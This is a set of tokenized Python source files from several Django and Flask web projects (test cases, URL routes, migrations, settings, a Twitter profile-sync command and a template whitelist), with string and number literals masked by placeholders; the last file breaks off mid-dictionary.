<s> """<STR_LIT>""" <EOL> import datetime <EOL> from django . template import Template , Context <EOL> import mock <EOL> from tests import case <EOL> class ResultForTest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> def result_for ( self , runcaseversion , user , environment , render ) : <EOL> """<STR_LIT>""" <EOL> t = Template ( <EOL> "<STR_LIT>" <EOL> + render ) <EOL> return t . render ( <EOL> Context ( { "<STR_LIT>" : runcaseversion , "<STR_LIT:user>" : user , "<STR_LIT>" : environment } ) ) <EOL> def test_result_exists ( self ) : <EOL> """<STR_LIT>""" <EOL> r = self . F . ResultFactory ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r . runcaseversion , r . tester , r . environment , "<STR_LIT>" ) , <EOL> str ( r . id ) <EOL> ) <EOL> def test_dupe_complete_results_keeps_both_finds_latest ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( "<STR_LIT>" ) as mock_utcnow : <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r = self . F . ResultFactory ( <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r2 = self . F . ResultFactory ( <EOL> tester = r . tester , <EOL> runcaseversion = r . runcaseversion , <EOL> environment = r . environment , <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r . runcaseversion , r . tester , r . environment , "<STR_LIT>" ) , <EOL> str ( r2 . id ) , <EOL> ) <EOL> self . assertEqual ( self . model . Result . objects . count ( ) , <NUM_LIT:2> ) <EOL> def test_dupe_incomplete_results_keeps_both_finds_latest ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( "<STR_LIT>" ) as mock_utcnow : <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r = self . F . ResultFactory ( ) <EOL> mock_utcnow . return_value = datetime . 
datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r2 = self . F . ResultFactory ( <EOL> tester = r . tester , <EOL> runcaseversion = r . runcaseversion , <EOL> environment = r . environment , <EOL> ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r . runcaseversion , r . tester , r . environment , "<STR_LIT>" ) , <EOL> str ( r2 . id ) , <EOL> ) <EOL> self . assertEqual ( self . model . Result . objects . count ( ) , <NUM_LIT:2> ) <EOL> def test_dupe_latest_results_sets_non_latest_to_false ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( "<STR_LIT>" ) as mock_utcnow : <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> res1 = self . F . ResultFactory ( <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> res2 = self . F . ResultFactory ( <EOL> tester = res1 . tester , <EOL> runcaseversion = res1 . runcaseversion , <EOL> environment = res1 . environment , <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> self . model . Result . objects . filter ( pk = res1 . pk ) . update ( <EOL> is_latest = True , <EOL> ) <EOL> self . assertEqual ( self . result_for ( <EOL> res1 . runcaseversion , <EOL> res1 . tester , <EOL> res1 . environment , <EOL> "<STR_LIT>" , <EOL> ) , str ( res2 . id ) ) <EOL> self . assertEqual ( self . model . Result . objects . count ( ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( <EOL> self . model . Result . objects . get ( is_latest = True ) . pk , res2 . pk ) <EOL> def test_result_does_not_exist ( self ) : <EOL> """<STR_LIT>""" <EOL> rcv = self . F . RunCaseVersionFactory . create ( ) <EOL> env = self . F . EnvironmentFactory . create ( ) <EOL> user = self . F . UserFactory . create ( ) <EOL> self . assertEqual ( <EOL> self . 
result_for ( <EOL> rcv , <EOL> user , <EOL> env , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( rcv . id , env . id , user . id ) <EOL> ) <EOL> class StepResultForTest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> def result_for ( self , result , step , render ) : <EOL> """<STR_LIT>""" <EOL> t = Template ( <EOL> "<STR_LIT>" <EOL> + render ) <EOL> return t . render ( <EOL> Context ( { "<STR_LIT:result>" : result , "<STR_LIT>" : step } ) ) <EOL> def test_stepresult_exists ( self ) : <EOL> """<STR_LIT>""" <EOL> sr = self . F . StepResultFactory ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> sr . result , sr . step , "<STR_LIT>" ) , <EOL> str ( sr . id ) <EOL> ) <EOL> def test_step_result_does_not_exist ( self ) : <EOL> """<STR_LIT>""" <EOL> r = self . F . ResultFactory . create ( ) <EOL> step = self . F . CaseStepFactory . create ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r , <EOL> step , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( r . id , step . id ) <EOL> ) <EOL> def test_result_does_not_exist ( self ) : <EOL> """<STR_LIT>""" <EOL> r = self . F . ResultFactory . build ( ) <EOL> step = self . F . CaseStepFactory . create ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r , <EOL> step , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( step . id ) <EOL> ) <EOL> class SuitesForTest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> def suites_for ( self , run , runcaseversion , render ) : <EOL> """<STR_LIT>""" <EOL> t = Template ( <EOL> "<STR_LIT>" <EOL> + render ) <EOL> return t . render ( <EOL> Context ( { "<STR_LIT>" : run , "<STR_LIT>" : runcaseversion } ) ) <EOL> def test_multiple_source_suites ( self ) : <EOL> """<STR_LIT>""" <EOL> envs = self . F . EnvironmentFactory . create_set ( [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ) <EOL> pv = self . F . ProductVersionFactory ( environments = envs ) <EOL> tc = self . F . CaseFactory . 
create ( product = pv . product ) <EOL> cv = self . F . CaseVersionFactory . create ( <EOL> case = tc , productversion = pv , status = "<STR_LIT>" ) <EOL> ts1 = self . F . SuiteFactory . create ( product = pv . product , status = "<STR_LIT>" ) <EOL> self . F . SuiteCaseFactory . create ( suite = ts1 , case = tc ) <EOL> ts2 = self . F . SuiteFactory . create ( product = pv . product , status = "<STR_LIT>" ) <EOL> self . F . SuiteCaseFactory . create ( suite = ts2 , case = tc ) <EOL> r = self . F . RunFactory . create ( productversion = pv , environments = envs ) <EOL> self . F . RunSuiteFactory . create ( suite = ts1 , run = r ) <EOL> self . F . RunSuiteFactory . create ( suite = ts2 , run = r ) <EOL> r . activate ( ) <EOL> self . assertEqual ( <EOL> self . suites_for ( <EOL> r , <EOL> self . model . RunCaseVersion . objects . get ( ) , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( ts1 . id , ts2 . id ) <EOL> ) <EOL> def test_source_suite ( self ) : <EOL> """<STR_LIT>""" <EOL> envs = self . F . EnvironmentFactory . create_set ( [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ) <EOL> pv = self . F . ProductVersionFactory ( environments = envs ) <EOL> tc = self . F . CaseFactory . create ( product = pv . product ) <EOL> self . F . CaseVersionFactory . create ( <EOL> case = tc , productversion = pv , status = "<STR_LIT>" ) <EOL> ts = self . F . SuiteFactory . create ( product = pv . product , status = "<STR_LIT>" ) <EOL> self . F . SuiteCaseFactory . create ( suite = ts , case = tc ) <EOL> r = self . F . RunFactory . create ( productversion = pv , environments = envs ) <EOL> self . F . RunSuiteFactory . create ( suite = ts , run = r ) <EOL> r . activate ( ) <EOL> rcv = r . runcaseversions . get ( ) <EOL> self . assertEqual ( <EOL> self . suites_for ( <EOL> r , <EOL> self . model . RunCaseVersion . objects . get ( ) , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( ts . id ) <EOL> ) </s>
<s> from django . conf . urls import url <EOL> import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . admin , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . manage_project , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . manage_project , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . get_slug , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterModelOptions ( <EOL> name = '<STR_LIT>' , <EOL> options = { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT:code>' ] } , <EOL> ) , <EOL> migrations . RenameField ( <EOL> model_name = '<STR_LIT>' , <EOL> old_name = '<STR_LIT>' , <EOL> new_name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT> , verbose_name = b'<STR_LIT>' , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> import sys <EOL> from . base import * <EOL> try : <EOL> from . local import * <EOL> except ImportError , exc : <EOL> pass <EOL> TEST = len ( sys . argv ) > <NUM_LIT:1> and sys . argv [ <NUM_LIT:1> ] == '<STR_LIT:test>' <EOL> if TEST : <EOL> try : <EOL> from . test import * <EOL> except ImportError : <EOL> pass </s>
<s> from django_nose . tools import assert_equal <EOL> from pontoon . base . tests import ( <EOL> assert_attributes_equal , <EOL> create_tempfile , <EOL> LocaleFactory , <EOL> ) <EOL> from pontoon . base . utils import match_attr <EOL> class FormatTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> maxDiff = None <EOL> parse = None <EOL> supports_keys = False <EOL> supports_source = False <EOL> supports_source_string = False <EOL> def setUp ( self ) : <EOL> super ( FormatTestsMixin , self ) . setUp ( ) <EOL> self . locale = LocaleFactory . create ( <EOL> code = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> plural_rule = '<STR_LIT>' , <EOL> cldr_plurals = '<STR_LIT>' , <EOL> ) <EOL> def parse_string ( self , string , source_string = None , locale = None ) : <EOL> path = create_tempfile ( string ) <EOL> locale = locale or self . locale <EOL> if source_string is not None : <EOL> source_path = create_tempfile ( source_string ) <EOL> return path , self . parse ( path , source_path = source_path , locale = locale ) <EOL> else : <EOL> return path , self . parse ( path , locale = locale ) <EOL> def key ( self , source_string ) : <EOL> """<STR_LIT>""" <EOL> return source_string if not self . supports_keys else source_string + '<STR_LIT>' <EOL> def run_parse_basic ( self , input_string , translation_index ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ '<STR_LIT>' ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source : <EOL> assert_equal ( resource . translations [ translation_index ] . source , [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . 
translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_multiple_comments ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_multiple_sources ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) , ( '<STR_LIT>' , '<STR_LIT:3>' ) ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_fuzzy ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = True , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . 
translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_no_comments_no_sources ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_missing_traslation ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_plural_translation ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' <EOL> } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . 
translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' , <EOL> ) <EOL> def run_parse_plural_translation_missing ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { <EOL> <NUM_LIT:1> : '<STR_LIT>' <EOL> } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' , <EOL> ) <EOL> def run_parse_empty_translation ( self , input_string , translation_index ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : u'<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> ) <EOL> def assert_file_content ( self , file_path , expected_content , strip = True ) : <EOL> with open ( file_path ) as f : <EOL> actual_content = f . read ( ) <EOL> if strip : <EOL> actual_content = actual_content . strip ( ) <EOL> expected_content = expected_content . strip ( ) <EOL> self . assertMultiLineEqual ( actual_content , expected_content ) <EOL> def run_save_basic ( self , input_string , expected_string , source_string = None , resource_cb = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . 
parse_string ( input_string , source_string = source_string ) <EOL> def test_default ( res ) : <EOL> translation = res . translations [ <NUM_LIT:0> ] <EOL> translation . strings [ None ] = '<STR_LIT>' <EOL> translation . fuzzy = True <EOL> ( resource_cb or test_default ) ( resource ) <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_remove ( self , input_string , expected_string , source_string = None , remove_cb = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> def default_remove ( res ) : <EOL> translation = res . translations [ <NUM_LIT:0> ] <EOL> translation . strings = { } <EOL> ( remove_cb or default_remove ) ( resource ) <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_plural ( self , input_string , expected_string , source_string = None ) : <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> translation = resource . translations [ <NUM_LIT:0> ] <EOL> translation . strings [ <NUM_LIT:0> ] = '<STR_LIT>' <EOL> translation . strings [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_plural_remove ( self , input_string , expected_string , source_string = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> translation = resource . translations [ <NUM_LIT:0> ] <EOL> translation . strings [ <NUM_LIT:0> ] = '<STR_LIT>' <EOL> del translation . strings [ <NUM_LIT:1> ] <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_remove_fuzzy ( self , input_string , expected_string , source_string = None ) : <EOL> path , resource = self . 
parse_string ( input_string , source_string = source_string ) <EOL> resource . translations [ <NUM_LIT:0> ] . fuzzy = False <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_translation_missing ( self , source_string , input_string , expected_string ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> missing_translation = match_attr ( resource . translations , key = '<STR_LIT>' ) <EOL> missing_translation . strings = { None : '<STR_LIT>' } <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_translation_identical ( self , source_string , input_string , expected_string ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> translation = match_attr ( resource . translations , key = '<STR_LIT>' ) <EOL> translation . strings = { None : '<STR_LIT>' } <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_no_changes ( self , input_string , expected_string , source_string = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) </s>
<s> from puente . utils import generate_keywords <EOL> TEXT_DOMAIN = '<STR_LIT>' <EOL> KEYWORDS = generate_keywords ( ) <EOL> COMMENT_TAGS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> DOMAIN_METHODS = None <EOL> BASE_DIR = None <EOL> JINJA2_CONFIG = None <EOL> PROJECT = '<STR_LIT>' <EOL> VERSION = '<STR_LIT:1.0>' <EOL> MSGID_BUGS_ADDRESS = '<STR_LIT>' <EOL> def get_setting ( key ) : <EOL> from django . conf import settings <EOL> return settings . PUENTE . get ( key , globals ( ) [ key ] ) </s>
<s> from django . conf import settings <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . paginator import Paginator , InvalidPage <EOL> from django . http import Http404 , HttpResponse <EOL> from django . utils import simplejson <EOL> def paginate ( request , queryset , results_per_page = <NUM_LIT:20> ) : <EOL> paginator = Paginator ( queryset , results_per_page ) <EOL> try : <EOL> page = paginator . page ( int ( request . GET . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> except InvalidPage : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise PermissionDenied ( ) <EOL> return page , paginator <EOL> def render_json_to_response ( context ) : <EOL> '''<STR_LIT>''' <EOL> result = simplejson . dumps ( context , sort_keys = False , indent = <NUM_LIT:4> ) <EOL> return HttpResponse ( result , mimetype = '<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> from datetime import datetime <EOL> import json <EOL> import logging <EOL> import oauth2 as oauth <EOL> from time import sleep <EOL> from django . conf import settings <EOL> from django . core . management . base import BaseCommand <EOL> from source . people . models import Person <EOL> SLEEP_SECONDS = <NUM_LIT:6> <EOL> CONSUMER_KEY = settings . TWITTER_CONSUMER_KEY <EOL> CONSUMER_SECRET = settings . TWITTER_CONSUMER_SECRET <EOL> ACCESS_KEY = settings . TWITTER_ACCESS_TOKEN <EOL> ACCESS_SECRET = settings . TWITTER_ACCESS_TOKEN_SECRET <EOL> logging . basicConfig ( filename = '<STR_LIT>' , filemode = '<STR_LIT:w>' , level = logging . INFO ) <EOL> def chunks ( object_list , chunk_size = <NUM_LIT:100> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( object_list ) , chunk_size ) : <EOL> yield object_list [ i : i + chunk_size ] <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> logging . info ( '<STR_LIT>' % datetime . now ( ) ) <EOL> person_queryset = Person . objects . exclude ( twitter_username = '<STR_LIT>' ) . values_list ( '<STR_LIT>' ) <EOL> person_list = list ( sum ( person_queryset , ( ) ) ) <EOL> person_list_sets = list ( chunks ( person_list ) ) <EOL> consumer = oauth . Consumer ( key = CONSUMER_KEY , secret = CONSUMER_SECRET ) <EOL> access_token = oauth . Token ( key = ACCESS_KEY , secret = ACCESS_SECRET ) <EOL> client = oauth . Client ( consumer , access_token ) <EOL> api_endpoint = '<STR_LIT>' <EOL> for person_set in person_list_sets : <EOL> querystring = '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( person_set ) <EOL> response , data = client . request ( '<STR_LIT>' % ( api_endpoint , querystring ) ) <EOL> users = json . loads ( data ) <EOL> for user in users : <EOL> try : <EOL> twitter_username = user [ '<STR_LIT>' ] <EOL> twitter_avatar = user [ '<STR_LIT>' ] <EOL> twitter_bio = user [ '<STR_LIT:description>' ] or '<STR_LIT>' <EOL> Person . objects . 
filter ( twitter_username__iexact = twitter_username ) . update ( <EOL> twitter_bio = twitter_bio , <EOL> twitter_profile_image_url = twitter_avatar <EOL> ) <EOL> logging . info ( '<STR_LIT>' % twitter_username ) <EOL> except : <EOL> logging . info ( '<STR_LIT>' % user [ '<STR_LIT>' ] ) <EOL> pass <EOL> sleep ( SLEEP_SECONDS ) <EOL> logging . info ( '<STR_LIT>' % datetime . now ( ) ) </s>
<s> from flask import Blueprint , render_template <EOL> blueprint = Blueprint ( '<STR_LIT>' , __name__ ) <EOL> @ blueprint . route ( '<STR_LIT>' ) <EOL> def help ( ) : <EOL> """<STR_LIT>""" <EOL> return render_template ( '<STR_LIT>' ) </s>
<s> from flask import Flask <EOL> from nose . tools import eq_ <EOL> from standup . filters import format_update , gravatar_url , TAG_TMPL <EOL> from standup . tests import BaseTestCase <EOL> class FilterTestCase ( BaseTestCase ) : <EOL> def test_tags ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . app . app_context ( ) : <EOL> for tag in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> expected = '<STR_LIT>' % ( <EOL> tag , TAG_TMPL . format ( '<STR_LIT>' , tag [ <NUM_LIT:1> : ] . lower ( ) , tag [ <NUM_LIT:1> : ] ) ) <EOL> eq_ ( format_update ( tag ) , expected ) <EOL> for tag in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> eq_ ( format_update ( tag ) , tag ) <EOL> def test_gravatar_url ( self ) : <EOL> """<STR_LIT>""" <EOL> app = Flask ( __name__ ) <EOL> with app . test_request_context ( '<STR_LIT:/>' ) : <EOL> app . debug = True <EOL> url = gravatar_url ( '<STR_LIT>' ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> url = gravatar_url ( '<STR_LIT>' , <NUM_LIT:200> ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> app . debug = False <EOL> url = gravatar_url ( '<STR_LIT>' ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> url = gravatar_url ( '<STR_LIT>' ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) </s>
<s> TEMPLATE_BUILTIN_FUNC_WHITELIST = ( <EOL> '<STR_LIT:all>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:list>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:float>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:type>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:str>' , <EOL> '<STR_LIT:int>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:bool>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:object>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> HTTP_STATUS_CODES = { <EOL> <NUM_LIT:100> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:200> : '<STR_LIT:OK>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : 
